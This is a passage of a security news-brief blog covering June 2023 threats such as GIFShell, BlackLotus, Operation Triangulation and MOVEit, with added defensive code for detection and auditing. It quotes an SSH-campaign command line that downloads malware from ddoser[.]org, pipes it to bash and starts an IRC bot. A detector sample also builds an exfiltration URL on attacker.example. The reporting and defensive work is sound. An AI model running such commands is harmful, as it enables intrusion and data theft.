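Since Microsoft treats this as post-exploitation behaviour, detection falls to the tenant. The channel described above has one observable: a GIF "filename" that is really a base64-encoded command output, embedded in a card sent to a webhook. The following is an added example (my own code, not from the article) of a content check for message or card payloads: it extracts GIF URLs and flags those whose filename stem is long, valid base64 (standard or URL-safe) and decodes to mostly printable text. The card payload, the `attacker.example` host and the encoded output are constructed.

```python
import base64
import json
import re
from urllib.parse import urlparse

GIF_URL = re.compile(r"https?://[^\s\"'<>]+\.gif\b", re.I)
BASE64_CHARS = re.compile(r"[A-Za-z0-9+/=_-]+")


def decodes_to_text(stem: str, min_len: int = 24, printable_ratio: float = 0.9) -> bool:
    """True if the filename stem is long, base64 (standard or URL-safe) and decodes to mostly
    printable text. Random bytes (hashes, CDN ids) fail the printable-ratio test."""
    if len(stem) < min_len or not BASE64_CHARS.fullmatch(stem):
        return False
    normalised = stem.replace("-", "+").replace("_", "/")
    normalised += "=" * (-len(normalised) % 4)       # restore padding stripped from a URL
    try:
        raw = base64.b64decode(normalised, validate=True)
    except ValueError:                               # binascii.Error is a ValueError subclass
        return False
    if not raw:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    return printable / len(raw) >= printable_ratio


def suspicious_gif_urls(message: dict) -> list[str]:
    """Scan a serialised Teams message or card for GIF URLs whose filename carries encoded text."""
    hits = []
    for url in GIF_URL.findall(json.dumps(message)):
        filename = urlparse(url).path.rsplit("/", 1)[-1]
        stem = filename[: -len(".gif")]
        if decodes_to_text(stem):
            hits.append(url)
    return hits


# Constructed: what a compromised host's command output would look like once encoded into a filename.
EXFIL = base64.urlsafe_b64encode(b"uid=1000(svc) gid=1000(svc) groups=1000(svc)\n").decode()

# Constructed card payload: two benign images and one carrying encoded text.
SAMPLE_CARD = {
    "type": "message",
    "attachments": [{"content": {"body": [
        {"type": "Image", "url": "https://media.example/cats/happy_cat.gif"},
        {"type": "Image", "url": "https://cdn.example/g/9f1c0b4a7e2d3c5b8a6f4e1d2c3b4a59.gif"},
        {"type": "Image", "url": f"https://attacker.example/{EXFIL}.gif"},
    ]}}],
}

if __name__ == "__main__":
    for url in suspicious_gif_urls(SAMPLE_CARD):
        print("suspicious GIF reference:", url)
```

The hex-looking CDN name in the sample is long enough and is valid base64, but it decodes to high bytes and is rejected, which is why the printable-ratio step matters more than the length check. This is a content heuristic for a message-inspection hook or a SIEM parser over exported messages; it does not replace the endpoint control of keeping the backdoor off the host in the first place.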
Johnson, Mic, Understanding the Microsoft Teams Vulnerability: The GIFShell Attack, Latest Hacker News, 20 June 2023. Available online at https://latesthackingnews.com/2023/06/20/understanding-the-microsoft-teams-vulnerability-the-gifshell-attack/.
Verizon 2023 DBIR Available
From the "Dammit - we meant to post this weeks ago" department: Verizon's annual Data Breach Investigations Report is always an interesting read, and we go hunting for it every April/May, when it usually appears. This year's appeared a few weeks ago and is, as usual, very informative. Some interesting factoids:
- 83% of breaches involved external actors, with the majority of attacks financially-motivated, while 19% involved internal actors (sometimes unintentionally through misuse or human error)
- 24% of all breaches involved ransomware; it was used in 62% of incidents committed by organized crime and 59% of financially-motivated incidents
- 50% of all social engineering incidents used pretexting - scenarios invented to trick the victim into giving up information or doing something to enable a breach
- 74% of breaches involve human factors: errors, privilege misuse, theft of credentials or social engineering
- 95% of breaches are financially motivated
It certainly seems like we could obtain high returns from increased efforts in the human factors (education, training and awareness) aspects of our business.
Uncredited, 2023 Data Breach Investigations Report, Verizon, 2023. Available online at https://www.verizon.com/business/en-au/resources/reports/dbir/.
NSA Issues Guidance on BlackLotus
The National Security Agency has issued a mitigation guide for the BlackLotus bootkit. We reported on BlackLotus back in March, following an initial report from ESET, although the malware had been available since at least October 2022. It works by exploiting CVE-2022-21894, a vulnerability which was fixed by Microsoft in their January 2022 updates. However, the affected binaries were not added to the UEFI Secure Boot Deny List Database (DBX), and BlackLotus works by carrying its own copies of those older binaries - a technique referred to as "Baton Drop".
The NSA guide recommends a number of actions:
- Update recovery media and activate optional mitigations
- Harden defensive policies
- Monitor device integrity measurements and boot configuration
- Customize UEFI Secure Boot
It is important to bear in mind that BlackLotus is not a firmware implant, but a bypass of the secure boot process, and it can be removed or quarantined. Currently, it is only known to affect Windows 10 and 11, but fixes are also available for Windows 8.1. Although BlackLotus does contain some Linux boot binaries, Linux is not one of its targets. Linux admins can defend their systems by removing the Microsoft Windows Production CA 2011 certificate from Secure Boot's DB.
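Because the whole technique rests on the vulnerable boot binaries being absent from DBX, "monitor boot configuration" in practice means checking what your DBX actually contains. The following is an added example (my own code, not from the NSA guide) of a parser for the DBX variable: it walks the sequence of EFI_SIGNATURE_LIST structures, collects the SHA-256 entries, and answers whether a given image hash is revoked. The signature-type GUIDs and structure layout are from the UEFI specification; `build_sha256_list` and `build_x509_list` assemble a constructed DBX so the parser runs offline, and the two "revoked" hashes are placeholders, not the hashes of any real binary.

```python
import struct
import uuid
from pathlib import Path

# Signature-type GUIDs from the UEFI specification, in the on-disk (mixed-endian) layout.
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328").bytes_le
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072").bytes_le
# EFI_SIGNATURE_LIST: SignatureType, SignatureListSize, SignatureHeaderSize, SignatureSize
SIGNATURE_LIST_HEADER = struct.Struct("<16sIII")
OWNER_GUID_SIZE = 16          # each EFI_SIGNATURE_DATA starts with a SignatureOwner GUID


def parse_dbx(blob: bytes) -> set[bytes]:
    """Collect every SHA-256 entry in a DBX variable. Certificate-based lists are skipped."""
    hashes = set()
    offset = 0
    while offset < len(blob):
        if offset + SIGNATURE_LIST_HEADER.size > len(blob):
            raise ValueError("truncated EFI_SIGNATURE_LIST header")
        sig_type, list_size, header_size, sig_size = SIGNATURE_LIST_HEADER.unpack_from(blob, offset)
        end = offset + list_size
        if list_size < SIGNATURE_LIST_HEADER.size or end > len(blob):
            raise ValueError("corrupt EFI_SIGNATURE_LIST size")
        if sig_type == EFI_CERT_SHA256_GUID and sig_size == OWNER_GUID_SIZE + 32:
            pos = offset + SIGNATURE_LIST_HEADER.size + header_size
            while pos + sig_size <= end:
                hashes.add(blob[pos + OWNER_GUID_SIZE:pos + sig_size])
                pos += sig_size
        offset = end
    return hashes


def is_revoked(dbx_blob: bytes, image_hash: bytes) -> bool:
    """image_hash must be the Authenticode (PE image) SHA-256, not a plain hash of the file."""
    return image_hash in parse_dbx(dbx_blob)


def load_efivar(path: str) -> bytes:
    """Read DBX from Linux efivarfs; the first 4 bytes there are variable attributes, not data."""
    return Path(path).read_bytes()[4:]


def build_sha256_list(hashes) -> bytes:
    """Constructed EFI_SIGNATURE_LIST of SHA-256 entries with a zero owner GUID."""
    entries = b"".join(bytes(OWNER_GUID_SIZE) + h for h in hashes)
    header = SIGNATURE_LIST_HEADER.pack(EFI_CERT_SHA256_GUID, SIGNATURE_LIST_HEADER.size + len(entries),
                                        0, OWNER_GUID_SIZE + 32)
    return header + entries


def build_x509_list(der: bytes) -> bytes:
    """Constructed certificate list, present only to show that the parser skips it."""
    sig_size = OWNER_GUID_SIZE + len(der)
    header = SIGNATURE_LIST_HEADER.pack(EFI_CERT_X509_GUID, SIGNATURE_LIST_HEADER.size + sig_size, 0, sig_size)
    return header + bytes(OWNER_GUID_SIZE) + der


# Placeholder hashes standing in for revoked boot-manager entries (constructed, not real).
REVOKED_A = bytes.fromhex("11" * 32)
REVOKED_B = bytes.fromhex("22" * 32)
SAMPLE_DBX = build_x509_list(b"\x30\x03\x02\x01\x00") + build_sha256_list([REVOKED_A, REVOKED_B])

if __name__ == "__main__":
    print(f"{len(parse_dbx(SAMPLE_DBX))} SHA-256 entries in sample DBX")
    print("placeholder A revoked:", is_revoked(SAMPLE_DBX, REVOKED_A))
```

On a Linux host the variable is `/sys/firmware/efi/efivars/dbx-d719b2cb-3d3a-4596-a3bc-dad00e67656f` (read it with `load_efivar`); on Windows the same bytes come from `Get-SecureBootUEFI -Name dbx` in PowerShell. The check only tells you whether a hash you already have is revoked, so pair it with the Authenticode hash of the boot manager you are worried about, computed by a PE-aware tool, rather than a plain `sha256sum` of the file.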
National Security Agency, BlackLotus Mitigation Guide, cybersecurity information, ver 1.0, June 2023. Available online at https://media.defense.gov/2023/Jun/22/2003245723/-1/-1/0/CSI_BlackLotus_Mitigation_Guide.PDF.
Apple Issues Urgent Patches for 0days
Apple has issued urgent patches for two vulnerabilities in the iOS and iPadOS mobile device operating systems, in response to claims the vulnerabilities are being exploited in the wild.
The vulnerabilities are
- CVE-2023-32434: Integer overflow in the kernel due to inadequate input validation
- CVE-2023-32439: Type confusion in Webkit
The vulnerabilities were used by an implant, discovered by Kaspersky researchers and claimed to be part of a campaign which they have named Operation Triangulation. CVE-2023-32434 is used during initial exploitation, in order to gain root privileges before deploying the implant in memory - as a result, the implant cannot survive a reboot, and the attackers have to install it again by sending an iMessage with a malicious attachment. If the device is not rebooted, the implant normally removes itself after 30 days, although this can be extended.
Once running, the implant communicates with its C2 server via a RESTful HTTPS API, implemented with the Protobuf library. All traffic takes the form of key-value pairs, encrypted with either 3DES or RSA. The implant sends heartbeat messages, while the C2 server sends any of 24 commands for
- Interacting with the filesystem (creation, modification, exfiltration and removal of files)
- Interacting with processes (listing and terminating them)
- Dumping the victim’s keychain items, which can be useful for harvesting victim credentials
- Monitoring the victim’s geolocation
- Running additional modules, which are Mach-O executables loaded by the implant. These executables are reflectively loaded, with their binaries stored only in memory
The implant is written in Objective-C, which leaves some debugging information, such as the names of class members and methods, in the generated binary. Curiously, many of the resources accessed and operations performed by the implant are given database-related names - for example, a directory is referred to as a table, while a file is called a record, and the C2 server is a DB server - which led the Kaspersky researchers to name the implant TriangleDB.
Kucherin, Georgy, Leonid Bezvershenko and Igor Kuznetsov, Dissecting TriangleDB, a Triangulation spyware implant, blog post, 21 June 2023. Available online at https://securelist.com/triangledb-triangulation-implant/110050/.
Useful Ransomware Educational Resources
With ransomware being seen by the business community as one of the biggest, if not the biggest, current security threat, it is important to keep ourselves and our business principals well-informed about its evolution. A couple of useful resources have appeared in the last couple of days to assist with this.
First, Sophos has started to release a three-part documentary series entitled "Think You Know Ransomware?", compiled from over 100 hours of interviews with cybercriminals, security experts, industry analysts and policy makers. The first episode, "Origins of Cybercrime" is now available, with episodes 2 and 3 due for release over the next two weeks.
Meanwhile, at the Infosecurity Europe conference, Richard de la Torre, marketing manager at Bitdefender, gave a talk on the myths and misconceptions which surround ransomware. In his talk he describes how proactive defenders are making use of threat intelligence to prevent or disrupt attacks, as well as increasingly using decryptors to recover data. However, as de la Torre points out, ransomware operators are now putting much more effort into information exfiltration, taking time to stealthily move throughout the victim's networks, identifying the most valuable datasets as well as discovering whether they have cyber insurance.
Sophos, Think You Know Ransomware?, documentary series, June 2023. Available online at https://www.sophos.com/en-us/content/ransomware-documentary.
Raywood, Dan, Ransomware Misconceptions Abound, To the Benefit of Attackers, Dark Reading, 22 June 2023. Available online at https://www.darkreading.com/vulnerabilities-threats/ransomware-misconceptions-abound-to-the-benefit-of-attackers.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
Attacks on Poorly-Secured Linux Servers via sshd
Security researchers at South Korea's AhnLab Security Emergency Response Center have uncovered a campaign being run by an unknown threat actor against poorly-managed Linux servers via the SSH daemon (sshd). Once the actor has gained initial access, they install a range of malware, including the Tsunami DDoS bot, ShellBot, the XMRig Monero cryptominer and Log Cleaner.
Initial access seems to be gained through a brute force attack using common weak credentials (seriously - who uses "abcdefghi" or "123@abc" as a password on the root account?). From this point, a command line is pasted in which downloads and runs a variety of malware:
# nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c;nproc;ip a | grep glo;uname -a;cd /tmp;wget -O - ddoser[.]org/key|bash;cd /var/tmp;wget ddoser[.]org/a;chmod +x a;./a;wget ddoser[.]org/logo;perl logo irc.undernet.org 6667 -bash;rm -rf logo;wget ddoser[.]org/top;tar -zxvf top;rm -rf top;cd lib32;./go > /dev/null 2>&1 &
Some of the commands here are obviously meant to enumerate hardware such as GPUs which could be used for cryptomining, as well as to profile the machine, while the wget commands download the attacker's malware and tools. One of these is a shell script called key which, when run, performs some cleanup and also inserts a public key into the compromised account's ~/.ssh/authorized_keys file, allowing the actor to persist even if the weak password is changed.
The malware downloaded in this campaign is:
| Download URL | Malware |
|---|---|
| ddoser[.]org/key | Downloader Bash |
| ddoser[.]org/logo | ShellBot DDoS Bot |
| ddoser[.]org/siwen/bot | ShellBot DDoS Bot |
| ddoser[.]org/siwen/a | Tsunami DDoS Bot |
| ddoser[.]org/siwen/cls | MIG Logcleaner v2.0 |
| ddoser[.]org/siwen/clean | 0x333shadow Log Cleaner |
| ddoser[.]org/siwen/ping6 | Privilege escalation malware |
| ddoser[.]org/top | XMRig CoinMiner (compressed file) |
ASEC's report provides a complete rundown on this list of malware.
There's an obvious lesson here: SSH is mostly used for system administration, and administrators should be smart enough to know better. Passwords are a losing proposition - weak passwords especially so - and setting up public-key authentication with OpenSSH and PuTTY is very easy, after which password logins can be disabled completely, by setting
PasswordAuthentication no
in /etc/ssh/sshd_config. After that, one can sleep easy, because this and similar distributed password brute-forcing campaigns will simply not work.
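Two checks a defender would run after applying the advice above, as an added example that is not part of the ASEC report or this blog: an audit of sshd_config that follows sshd's own rule that the first occurrence of a keyword wins, and a comparison of an authorized_keys file against a known-good baseline to surface an inserted key of the kind the "key" script adds. All file contents and key blobs are constructed; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the ASEC report or the blog.  Audits an sshd_config
# the way sshd reads it (FIRST occurrence of a keyword wins; keywords after a
# "Match" line apply only conditionally) and lists authorized_keys entries that
# are absent from a known-good baseline.  All file contents are constructed.

# Effective value of KEYWORD in FILE: first match wins, comments and blank
# lines are skipped, and scanning stops at the first Match block.
# Prints DEFAULT if the keyword is not set in the global section.
sshd_effective() {
    file=$1; keyword=$2; default=$3
    val=$(awk -v kw="$keyword" '
        /^[[:space:]]*#/ || NF == 0 { next }
        tolower($1) == "match"      { exit }
        tolower($1) == tolower(kw)  { print $2; exit }
    ' "$file")
    printf '%s\n' "${val:-$default}"
}

# "yes" only if both password and keyboard-interactive (PAM) logins are off.
# OpenSSH defaults both to yes, so a missing line counts as enabled.  Older
# releases call the second keyword ChallengeResponseAuthentication.
password_logins_disabled() {
    pw=$(sshd_effective "$1" PasswordAuthentication yes)
    kbd=$(sshd_effective "$1" KbdInteractiveAuthentication yes)
    if [ "$pw" = no ] && [ "$kbd" = no ]; then echo yes; else echo no; fi
}

# Print each key in CURRENT whose key blob (2nd field) is absent from BASELINE.
# Assumes plain "type blob comment" lines with no options prefix.
unexpected_keys() {
    baseline=$1; current=$2
    grep -v -e '^[[:space:]]*#' -e '^[[:space:]]*$' "$current" |
    while IFS= read -r line; do
        blob=$(printf '%s\n' "$line" | awk '{ print $2 }')
        if ! awk -v b="$blob" '$2 == b { f = 1 } END { exit !f }' "$baseline"; then
            printf '%s\n' "$line"
        fi
    done
}

# --- constructed sample files (not real keys) -------------------------------
DEMO=$(mktemp -d)
cat > "$DEMO/sshd_config" <<'EOF'
#PasswordAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
Match User backup
    PasswordAuthentication yes
EOF
printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEbaselineKEY admin@bastion\n' > "$DEMO/baseline_keys"
cp "$DEMO/baseline_keys" "$DEMO/authorized_keys"
# a second key appended by someone else: the pattern the "key" script leaves behind
printf 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQFAKEinsertedKEY\n' >> "$DEMO/authorized_keys"

printf 'password logins disabled: %s\n' "$(password_logins_disabled "$DEMO/sshd_config")"
printf 'keys not in baseline:\n'
unexpected_keys "$DEMO/baseline_keys" "$DEMO/authorized_keys"
```

On a live host, `sshd -T` prints the fully resolved configuration and is the authoritative answer for anything this script simplifies, such as Include directives and Match blocks.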
Sanseo, Tsunami DDoS Malware Distributed to Linux SSH Servers, blog post, 20 June 2023. Available online at https://asec.ahnlab.com/en/54647/.
US Government Pursues Ransomware Operators
The US Government is continuing to pursue ransomware operators around the world. In their latest success, the US Department of Justice has announced the FBI's arrest of a 20-year-old Russian national, Ruslan Magomedovich Astamirov in connection with LockBit ransomware operations.
'According to a criminal complaint obtained in the District of New Jersey, from at least as early as August 2020 to March 2023, Astamirov allegedly participated in a conspiracy with other members of the LockBit ransomware campaign to commit wire fraud and to intentionally damage protected computers and make ransom demands through the use and deployment of ransomware. Specifically, Astamirov directly executed at least five attacks against victim computer systems in the United States and abroad.
'"Astamirov is the third defendant charged by this office in the LockBit global ransomware campaign, and the second defendant to be apprehended,” said U.S. Attorney Philip R. Sellinger for the District of New Jersey. “The LockBit conspirators and any other ransomware perpetrators cannot hide behind imagined online anonymity. We will continue to work tirelessly with all our law enforcement partners to identify ransomware perpetrators and bring them to justice."'
Astamirov is the second LockBit-affiliated Russian to be arrested.
Meanwhile, as the CL0P gang continues to exploit the MOVEit Transfer file transfer software and starts to extort the victims, the US State Department's Rewards for Justice program is offering up to $US10 million in rewards leading to the identification or location of CL0P and similar groups.
Uncredited, Russian National Arrested and Charged with Conspiring to Commit LockBit Ransomware Attacks Against U.S. and Foreign Businesses, US Department of Justice, 15 June 2023. Available online at https://www.justice.gov/opa/pr/russian-national-arrested-and-charged-conspiring-commit-lockbit-ransomware-attacks-against-us.
Rewards for Justice, "Advisory from @CISAgov, @FBI: ... ", tweet, 17 June 2023. Available online at https://twitter.com/RFJ_USA/status/1669740545403437056.
Android RAT Masquerades as Chat Apps
Researchers at ESET have been tracking an updated version of the GravityRAT spyware for Android, which is being distributed as trojaned versions of the messaging apps BingeChat and Chatico. These apps have never been distributed via the Google Play store, but instead are being promoted through malicious web sites - although how victims are lured to them is unknown.
GravityRAT has been around since at least 2015, and is a cross-platform remote access trojan, with versions for Windows, macOS and Android; its operator is unknown but possibly based in Pakistan, as it focuses on Indian targets. ESET tracks the threat actor as SpaceCobra.
This new variant actually does provide chat functionality, being based on the open-source OMEMO Instant Messenger app, but before the user even logs in to the app, it has already contacted its C2 server, exfiltrating the user's data and waiting for commands. GravityRAT can exfiltrate call logs, the user's contact list, SMS messages, various types of files and the device's location; the new variant can also delete files, contacts and call logs. It is also capable of exfiltrating backup files created by WhatsApp Messenger, which is extremely popular in India.
The ESET report contains IOCs and a mapping to MITRE ATT&CK techniques.
Stefanko, Lukas, Android GravityRAT goes after WhatsApp backups, blog post, 15 June 2023. Available online at https://www.welivesecurity.com/2023/06/15/android-gravityrat-goes-after-whatsapp-backups/.
Ransomware Permanently Closes Hospital
A salutary tale about cyber resilience, business continuity and the risk posed by ransomware: CBS News reports that a hospital in Central Illinois is closing down, at least in part due to a ransomware attack.
St. Margaret's Health, which operates in the city of Spring Valley, Illinois, will shut down today, blaming a devastating ransomware attack in 2021 which prevented it from filing insurance claims. This seems to be the first time that a hospital has blamed cybercriminals for its closure, although other factors, such as staffing costs and supply chain issues, also played a part.
CBS Chicago Team, Central Illinois hospital closing after 2021 ransomware attack, news report, 13 June 2023. Available online at https://www.cbsnews.com/chicago/news/st-maragrets-health-central-illinois-hospital-closing/.
MOVEit Transfer: The Gift That Just Keeps Giving
File transfer software vendor Progress Software has had to disclose yet another critical vulnerability in their MOVEit Transfer product. At the time of writing, no fix is available, and the suggested mitigation is to block all HTTP and HTTPS traffic to MOVEit Transfer machines. The firm notes that once this is done:
- Users will not be able to log on to the MOVEit Transfer web UI
- MOVEit Automation tasks that use the native MOVEit Transfer host will not work
- REST, Java and .NET APIs will not work
- MOVEit Transfer add-in for Outlook will not work
But other than that, it will be business as usual, with the SFTP and FTP protocols still working as normal - which renders using MOVEit somewhat pointless, since its major convenience is a browser-based interface that is easy for users.
Meanwhile, CNN News reports that a number of US Government agencies have been hit by ransomware group Cl0p, including the Department of Energy, as well as one of its subcontractors.
Progress Software, MOVEit Transfer Critical Vulnerability – CVE Pending (June 15, 2023), web article, 15 June 2023. Available online at https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023.
Lyngaas, Sean, Exclusive: US government agencies hit in global cyberattack, news report, 15 June 2023. Available online at https://edition.cnn.com/2023/06/15/politics/us-government-hit-cybeattack/index.html.
CISA Releases Two Advisories
The US Cybersecurity & Infrastructure Security Agency has released two advisories which should prove useful to enterprises everywhere.
The first, issued in conjunction with the NSA, addresses the recent vulnerabilities in baseboard management controllers (BMCs) discovered by Eclypsium. BMCs are buried deep within system boards and get access to the system even before the UEFI BIOS starts execution, allowing a threat actor to install bootkits, or disable the TPM and the UEFI secure boot process. In fact, the BMC remains active even when a server is powered down.
The CISA/NSA hardening guide lists a number of recommended actions, including updating BMC credentials, using VLAN segmentation to isolate BMCs from the other network infrastructure, performing routine update checks and other suggestions.
The other CISA advisory is one of a series on understanding ransomware threat actors, and deals specifically with the LockBit Ransomware-as-a-Service group. LockBit affiliates are probably the most active of all ransomware groups, and the advisory provides advice on the vulnerabilities they typically exploit, as well as the TTPs they use. It also provides a number of suggested mitigations.
Uncredited, CISA and NSA Release Joint Guidance on Hardening Baseboard Management Controllers (BMCs), cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-nsa-release-joint-guidance-hardening-baseboard-management-controllers-bmcs.
Uncredited, CISA and Partners Release Joint Advisory on Understanding Ransomware Threat Actors: LockBit, cybersecurity advisory alert, 14 June 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/06/14/cisa-and-partners-release-joint-advisory-understanding-ransomware-threat-actors-lockbit.
Microsoft Patches Windows Kernel Vuln, Doesn't Enable Patch
A curious situation has arisen with yesterday's updates for Windows Server 2022, Windows 10 and Windows 11: the Redmondites shipped a patch for an important kernel information disclosure vulnerability, but did not enable the fix. The vulnerability, which could allow an authenticated but unprivileged attacker to view the contents of the heap of a privileged process, was awarded a base CVSS 3.1 score of 4.7 - it would have been higher if the attack were not so complex, requiring coordination with another, privileged process.
At a guess, the likely delay in enabling the fix is due to the time required to perform comprehensive regression testing; after all, everything makes use of the heap and the kernel, so there could be corner cases with applications doing strange things that a fix would break. However, users who have relatively simple installations, especially in high-threat environments, e.g. facing the Internet, may want to enable the fix, and Microsoft has released a knowledge base article providing instructions.
Enabling the patch simply involves adding a registry entry, with different values for the various affected platforms. You might want to test the effects in a lab environment before deploying this too widely, though.
Uncredited, KB5028407: How to manage the vulnerability associated with CVE-2023-32019, Windows Support knowledge base article, 13 June 2023. Available online at https://support.microsoft.com/en-gb/topic/kb5028407-how-to-manage-the-vulnerability-associated-with-cve-2023-32019-bd6ed35f-48b1-41f6-bd19-d2d97270f080.
Yet Another Side-Channel Attack - This Time Using Power LEDs
In a paper to be presented at Black Hat 23, researchers from Cornell and Ben Gurion universities demonstrate a novel technique to recover cryptographic keys from a device by analyzing video footage of the device's power LED. This works because the cryptographic computations performed by the CPU change the device's power consumption, which in turn affects the brightness of the power LED.
The attack uses an ingenious technique to increase the camera's sampling rate from the normal rate of 60 frames per second, which would be too slow, to 60 thousand measurements per second by exploiting the camera's rolling shutter.
In their first demonstrations, the researchers were able to recover a 256-bit ECDSA key from a smart card by analyzing video footage of the power LED of a smart card reader via a hijacked Internet-connected security camera located 16 meters away from the smart card reader.
The device need not even have a power LED itself, but merely be connected to something that does; in their second attack the researchers were able to recover a 378-bit SIKE key from a Samsung Galaxy S8 by analyzing video footage of the power LED of Logitech Z120 USB speakers that were connected to the same USB hub used to charge the phone. In this case, the camera was an iPhone 13 Pro Max.
I shall be interested to see whether this technique will work against the LEDs of a beefy tower computer when a security key is being used as part of multi-factor authentication. If it does, I shall be disabling the LEDs and adding a roll of thick black electrical tape to my travel kit.
Nassi, Ben, et al., Video-Based Cryptanalysis: Extracting Cryptographic Keys from Video Footage of a Device's Power LED, conference presentation, August 2023. Available online at https://www.nassiben.com/video-based-crypta.